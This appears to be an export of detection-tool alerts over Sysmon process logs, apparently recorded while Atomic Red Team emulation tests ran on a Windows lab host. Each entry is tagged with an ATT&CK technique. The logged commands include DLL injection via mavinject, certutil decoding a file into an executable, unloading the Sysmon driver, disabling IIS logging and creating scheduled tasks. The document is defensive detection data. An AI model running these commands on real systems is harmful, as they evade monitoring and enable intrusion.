C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548022.301844,2019-07-19T18:53:42.301844+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "arp -a" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4029 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:42.259 + 747F3D96-D976-5D31-0000-0010DBCC3700 + 6292 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "arp -a" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548022.276408,2019-07-19T18:53:42.276408+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4028 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:42.051 + 747F3D96-D976-5D31-0000-00104AC63700 + 6412 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548266.828722,2019-07-19T18:57:46.828722+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4088 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:46.531 + 747F3D96-DA6A-5D31-0000-001025AD3E00 + 4552 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1053] Scheduled Task - Process,1563548266.608481,2019-07-19T18:57:46.608481+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4086 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + Persistence - Scheduled Task Management + 2019-07-19 14:57:46.443 + 747F3D96-DA6A-5D31-0000-0010C4A83E00 + 1408 + C:\Windows\System32\schtasks.exe + 10.0.17763.1 (WinBuild.160101.0800) + Task Scheduler Configuration Tool + Microsoft® Windows® Operating System + Microsoft Corporation + SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10 + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69 + 747F3D96-DA6A-5D31-0000-001072A63E00 + 4276 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548266.459733,2019-07-19T18:57:46.459733+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4085 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:46.411 + 747F3D96-DA6A-5D31-0000-001072A63E00 + 4276 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548266.422427,2019-07-19T18:57:46.422427+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4084 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:46.174 + 747F3D96-DA6A-5D31-0000-0010C09D3E00 + 3224 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548266.094355,2019-07-19T18:57:46.094355+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "at 13:20 /interactive cmd" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4082 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:46.051 + 747F3D96-DA6A-5D31-0000-0010B2953E00 + 5036 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "at 13:20 /interactive cmd" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548264.283188,2019-07-19T18:57:44.283188+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4080 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:16.531 + 747F3D96-DA4C-5D31-0000-001077603D00 + 6172 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548236.552097,2019-07-19T18:57:16.552097+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c .\bin\T1055.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4079 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:16.477 + 747F3D96-DA4C-5D31-0000-0010655D3D00 + 2596 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c .\bin\T1055.exe + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1179] Hooking detected,1563548236.496455,2019-07-19T18:57:16.496455+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\mavinject.exe ) through command line ( "C:\Windows\system32\mavinject.exe" 3912 /INJECTRUNNING C:\AtomicRedTeam\atomics\T1055\src\x64\T1055.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4078 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:15.754 + 747F3D96-DA4B-5D31-0000-0010CB413D00 + 2604 + C:\Windows\System32\mavinject.exe + 10.0.17763.1 (WinBuild.160101.0800) + Microsoft Application Virtualization Injector + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\mavinject.exe" 3912 /INJECTRUNNING C:\AtomicRedTeam\atomics\T1055\src\x64\T1055.dll + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=3627AD593F3A956FA07382914B52AAB5CE98C817,MD5=72D5E2A3FF5D88C891E0DF1AA28B6422,SHA256=ABB99F7CFD3E9EB294501AAFA082A8D4841278CC39A4FB3DFF9942CA1F71A139,IMPHASH=96A5873241D90136570C05E55F0B5B2A + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548235.776993,2019-07-19T18:57:15.776993+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4077 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:14.972 + 747F3D96-DA4A-5D31-0000-00107A2C3D00 + 2584 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548234.991615,2019-07-19T18:57:14.991615+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "C:\Windows\System32\inetsrv\appcmd.exe set config " "Default /section:httplogging /dontLog:true" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4076 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:14.928 + 747F3D96-DA4A-5D31-0000-00106C293D00 + 4056 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "C:\Windows\System32\inetsrv\appcmd.exe set config " "Default /section:httplogging /dontLog:true" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548234.944276,2019-07-19T18:57:14.944276+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4075 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:14.745 + 747F3D96-DA4A-5D31-0000-0010EE223D00 + 1012 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548234.758535,2019-07-19T18:57:14.758535+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "fltmc.exe unload SysmonDrv" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4074 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:14.696 + 747F3D96-DA4A-5D31-0000-0010C21F3D00 + 3976 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "fltmc.exe unload SysmonDrv" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548234.715974,2019-07-19T18:57:14.715974+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4073 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:04.529 + 747F3D96-DA40-5D31-0000-0010E16B3C00 + 264 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548224.41285,2019-07-19T18:57:04.412850+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4069 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:04.346 + 747F3D96-DA40-5D31-0000-0010565D3C00 + 3932 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-DA40-5D31-0000-0010CF5A3C00 + 4336 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "cmd.exe /c %temp%tcm.tmp -decode c:\file.exe file.txt" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548224.361122,2019-07-19T18:57:04.361122+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "cmd.exe /c %%temp%%tcm.tmp -decode c:\file.exe file.txt" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4068 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:04.316 + 747F3D96-DA40-5D31-0000-0010CF5A3C00 + 4336 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "cmd.exe /c %%temp%%tcm.tmp -decode c:\file.exe file.txt" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548224.333864,2019-07-19T18:57:04.333864+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c copy C:\Windows\\system32\\certutil.exe C:\Users\IEUser\AppData\Local\Temptcm.tmp ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4067 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:04.256 + 747F3D96-DA40-5D31-0000-0010B1553C00 + 5168 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /c copy C:\Windows\\system32\\certutil.exe C:\Users\IEUser\AppData\Local\Temptcm.tmp + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-DA40-5D31-0000-00106A543C00 + 6572 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "cmd.exe /c copy %windir%\\system32\\certutil.exe %temp%tcm.tmp" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548224.294575,2019-07-19T18:57:04.294575+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "cmd.exe /c copy %%windir%%\\system32\\certutil.exe %%temp%%tcm.tmp" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4066 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:04.236 + 747F3D96-DA40-5D31-0000-00106A543C00 + 6572 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "cmd.exe /c copy %%windir%%\\system32\\certutil.exe %%temp%%tcm.tmp" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548224.270645,2019-07-19T18:57:04.270645+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4065 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:03.938 + 747F3D96-DA3F-5D31-0000-0010813E3C00 + 7140 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1563548224.210561,2019-07-19T18:57:04.210561+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\certutil.exe) with commandline ( certutil.exe -decode file.txt c:\file.exe)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4064 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:03.818 + 747F3D96-DA3F-5D31-0000-001022323C00 + 6888 + C:\Windows\System32\certutil.exe + 10.0.17763.1 (WinBuild.160101.0800) + CertUtil.exe + Microsoft® Windows® Operating System + Microsoft Corporation + certutil.exe -decode file.txt c:\file.exe + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4 + 747F3D96-DA3F-5D31-0000-0010562E3C00 + 4020 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "certutil.exe -decode file.txt c:\file.exe" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1140] Deobfuscate/Decode Files or Information,1563548224.210561,2019-07-19T18:57:04.210561+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\certutil.exe ) through command line ( certutil.exe -decode file.txt c:\file.exe ) tried decoding file or information,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4064 + + + + + Microsoft-Windows-Sysmon/Operational + 